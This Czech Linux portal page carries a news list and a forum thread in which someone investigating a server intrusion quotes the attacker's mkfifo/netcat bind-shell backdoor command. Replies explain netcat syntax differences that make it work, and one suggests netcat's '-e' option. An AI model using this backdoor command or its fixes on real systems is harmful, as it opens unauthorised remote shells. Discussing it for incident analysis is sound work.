abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 22:00 | IT novinky

    Uživatelé komunikátoru Signal si mohou svá data přímo v Signalu bezpečně zálohovat a v případě rozbití nebo ztráty telefonu následně na novém telefonu obnovit. Zálohování posledních 45 dnů je zdarma. Nad 45 dnů je zpoplatněno částkou 1,99 dolaru měsíčně.

    Ladislav Hagara | Komentářů: 0
    včera 18:44 | Zajímavý článek

    Server Groklaw, zaměřený na kauzy jako právní spory SCO týkající se Linuxu, skončil před 12 lety, resp. doména stále existuje, ale web obsahuje spam propagující hazardní hry. LWN.net proto v úvodníku připomíná důležitost zachovávání komunitních zdrojů a upozorňuje, že Internet Archive je také jen jeden.

    Fluttershy, yay! | Komentářů: 2
    včera 14:22 | Nová verze

    Jakub Vrána vydal Adminer ve verzi 5.4.0: "Delší dobu se v Admineru neobjevila žádná závažná chyba, tak jsem nemusel vydávat novou verzi, až počet změn hodně nabobtnal."

    Ladislav Hagara | Komentářů: 1
    včera 13:22 | IT novinky

    V Německu slavnostně uvedli do provozu (en) nejrychlejší počítač v Evropě. Superpočítač Jupiter se nachází ve výzkumném ústavu v Jülichu na západě země, podle německého kancléře Friedricha Merze otevírá nové možnosti pro trénování modelů umělé inteligence (AI) i pro vědecké simulace. Superpočítač Jupiter je nejrychlejší v Evropě a čtvrtý nejrychlejší na světě (TOP500). „Chceme, aby se z Německa stal národ umělé inteligence,“ uvedl na

    … více »
    Ladislav Hagara | Komentářů: 12
    7.9. 04:11 | Komunita

    V Berlíně probíhá konference vývojářů a uživatelů desktopového prostředí KDE Plasma Akademy 2025. Při té příležitosti byla oznámena alfa verze nové linuxové distribuce KDE Linux.

    Ladislav Hagara | Komentářů: 1
    6.9. 17:11 | Nová verze

    Byl vydán Debian 13.1, tj. první opravná verze Debianu 13 s kódovým názvem Trixie a Debian 12.12, tj. dvanáctá opravná verze Debianu 12 s kódovým názvem Bookworm. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Instalační média Debianu 13 a Debianu 12 lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.

    Ladislav Hagara | Komentářů: 2
    5.9. 23:44 | IT novinky

    Evropská komise potrestala Google ze skupiny Alphabet pokutou 2,95 miliardy eur (71,9 miliardy Kč) za porušení antimonopolní legislativy. Podle EK, která mimo jiné plní funkci antimonopolního orgánu EU, se Google dopustil protisoutěžních praktik ve svém reklamním byznysu. Google v reakci uvedl, že rozhodnutí považuje za chybné a hodlá se proti němu odvolat. EK ve věci rozhodovala na základě stížnosti Evropské rady vydavatelů. Podle

    … více »
    Ladislav Hagara | Komentářů: 43
    5.9. 23:11 | Komunita

    Podpora 32bitového Firefoxu pro Linux skončí v roce 2026. Poslední podporované 32bitové verze budou Firefox 144 a Firefox 140 s rozšířenou podporou, jehož podpora skončí v září 2026.

    Ladislav Hagara | Komentářů: 3
    5.9. 19:33 | IT novinky

    Společnost Raspberry Pi nově nabízí Raspberry Pi SSD s kapacitou 1 TB za 70 dolarů.

    Ladislav Hagara | Komentářů: 12
    5.9. 15:55 | Zajímavý software

    Microsoft BASIC pro mikroprocesor 6502 byl uvolněn jako open source. Zdrojový kód je k dispozici na GitHubu.

    Ladislav Hagara | Komentářů: 14
    Pro otevření více webových stránek ve webovém prohlížečí používám
     (83%)
     (7%)
     (2%)
     (3%)
     (3%)
     (2%)
    Celkem 156 hlasů
     Komentářů: 11, poslední 4.9. 16:12
    Rozcestník

    Dotaz: netcat a zadní vrátka

    30.3.2017 17:07 Karel Marhoul
    netcat a zadní vrátka
    Přečteno: 477×
    Zdravím,

    nedávno jsem vyšetřoval hackerský průnik na jeden starší linuxový server. Zaujal mě způsob, jakým si útočník pod neprivilegovaným uživatelem otevřel zadní vrátka - shell, na portu 1234:
    rm -f /tmp/f
    mkfifo /tmp/f
    cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
    
    Když jsem však totéž nyní zkoušel na svém Debian Stable serveru, příkaz se chová tak, že netcat otevře náhodný vysoký port (místo portu 1234):
    kmarhoul@debian:~$ netstat  -nlpt
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:48705           0.0.0.0:*               LISTEN      12546/nc        
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
    tcp        0      0 0.0.0.0:48886           0.0.0.0:*               LISTEN      -               
    tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
    tcp6       0      0 :::443                  :::*                    LISTEN      -               
    tcp6       0      0 :::43168                :::*                    LISTEN      -               
    tcp6       0      0 :::111                  :::*                    LISTEN      -               
    tcp6       0      0 :::80                   :::*                    LISTEN      -               
    tcp6       0      0 :::22                   :::*                    LISTEN      -               
    tcp6       0      0 ::1:25                  :::*                    LISTEN      -     
    
    A po vzdáleném připojení na tento port výše uvedené havaruje a shell nedostanu:
    kmarhoul@debian:~$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
    invalid connection to [85.255.X.X] from (UNKNOWN) [95.82.X.X] 27619
    
    Zkoušel jsem to ještě na jiném serveru (také Debian Jessie) a stejné chování, přitom na kompromitovaném serveru to prošlo. Nevíte prosím někdo, čím to může být?

    Odpovědi

    pepe_ avatar 30.3.2017 17:41 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Není to podle verze  ? netcat-traditional , netcat-openbsd , netcat6 pak v novějších verzích třeba je nutné zadávat parametry -p 1234  místo   bez portu.. něco z toho bude pravda podle mne.
    30.3.2017 20:56 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Neodpoviem, ale sa spýtam ako si sa vzdialene pripojil na ten port?
    30.3.2017 21:07 mhepp
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Prvně předpokládám, že localhost je pouze pro ilustraci příkazu, ne reálná adresa. Potom připojení je jednoduché:

    telnet IP.AD.RE.SA 1234
    30.3.2017 21:56 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    ok, dík, ale skôr

    netcat host port
    30.3.2017 22:00 marian34
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    U mňa funkčné
    ~$ netcat -h
    OpenBSD netcat (Debian patchlevel 1.89-4ubuntu1)
    This is nc from the netcat-openbsd package. An alternative nc is available
    in the netcat-traditional package.
    30.3.2017 22:52 Michal Kubeček | skóre: 71 | Luštěnice
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    U openbsd netcatu je syntaxe pro listening "netcat -l 1234", ale u některých jiných verzí "netcat -l -p 1234".
    2.4.2017 00:16 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Jj netcat používá "-l ... -p" pro server a nic pro klienta.
    30.3.2017 22:50 Michal Kubeček | skóre: 71 | Luštěnice
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    To je dost předčasná otázka v okamžiku, kdy má tazatel problém s tím, že mu ani ten listening socket neposlouchá na požadovaném portu.
    2.4.2017 00:18 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: netcat a zadní vrátka
    Teda ale slabý útočník. Mělo by stačit použít přepínač -e (jako execute) :-D.

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.